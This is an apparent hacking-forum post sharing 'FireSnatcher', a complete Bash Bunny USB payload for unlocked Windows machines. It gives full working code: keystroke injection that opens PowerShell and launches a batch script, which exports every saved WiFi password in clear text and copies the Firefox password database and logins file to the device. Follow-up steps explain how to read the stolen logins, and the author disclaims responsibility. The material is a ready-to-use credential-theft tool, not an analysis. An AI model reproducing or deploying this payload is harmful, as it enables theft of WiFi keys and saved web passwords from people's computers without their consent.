KarrotKak3 Posted April 24, 2022 Share Posted April 24, 2022 Greetings. This is my First Payload written for the Bash Bunny. https://github.com/KarrotKak3/FireSnatcher.git # Props: saintcrossbow & 0iphor13 - I used their work for examples # Full Description # ---------------- # Attacks an Unlocked Windows Machine # Payload targets: # - All WiFi creds # - Firefox Saved Password Database # # PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC # Files # ----- # - payload.txt: Starts the attack. All configuration contained in this file. # - FireSnatcher.bat: Worker that grabs Creds # KNOWN ISSUES # --------------- # Loot is saved in Payloads/switch#/loot CODE: Payload.txt # Title: FireSnatcher # Description: Copies Wifi Keys, and Firefox Password Databases # Author: KarrotKak3 # Props: saintcrossbow & 0iphor13 # Version: 1.0.2.0 (Work in Progress) # Category: Credentials # Target: Windows (Logged in) # Attackmodes: HID, Storage # Full Description # ---------------- # Attacks an Unlocked Windows Machine # Payload targets: # - All WiFi creds # - Firefox Saved Password Database # # PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC # Delays to Allow Powershell Time to Open and to Give Attack time to Run # HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT # %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE # Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins # KNOWN ISSUES # --------------- # Loot is saved in Payloads/switch#/loot # Files # ----- # - payload.txt: Starts the attack. All configuration contained in this file. # - FireSnatcher.bat: Worker that grabs Creds # Setup # ----- # - Place the payload.txt and FireSnatcher.bat in Payload folder # - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) # - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility # LEDs # ---- # Magenta: Initial setup – about 1 – 3 seconds # Single yellow blink: Attack in progress # Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed # Options # ------- # Name of Bash Bunny volume that appears to Windows (BashBunny is default) BB_NAME="BashBunny" # Setup # ----- LED SETUP # Attack # ------ ATTACKMODE HID STORAGE Q DELAY 500 LED ATTACK Q DELAY 100 Q GUI r Q DELAY 100 Q STRING powershell Start-Process powershell Q ENTER Q DELAY 7000 Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" Q ENTER Q DELAY 8000 Q STRING EXIT Q ENTER sync LED FINISH Q DELAY 1500 shutdown now FireSnatcher.bat mkdir %~dp0\loot\%COMPUTERNAME% cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear C: cd \D %appdata%\mozilla\firefox\profiles\ cd %appdata%\mozilla\firefox\profiles\*.default-release\ copy key4.db %~dp0\loot\%COMPUTERNAME% copy logins.json %~dp0\loot\%COMPUTERNAME% ## ## Usage: Make Files Payload.txt and FireSnatcher.bat containing above code ## Copy Both files to either Payloads\{switch1 or switch2} ## ## Loot will be copied to .\payloads\{switch}\loot instead of .\loot As Always, I am not Responsible for what you do with this payload. KarrotKak3 Link to comment Share on other sites More sharing options...
KarrotKak3 Posted April 24, 2022 Author Share Posted April 24, 2022 HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT # %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE # Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.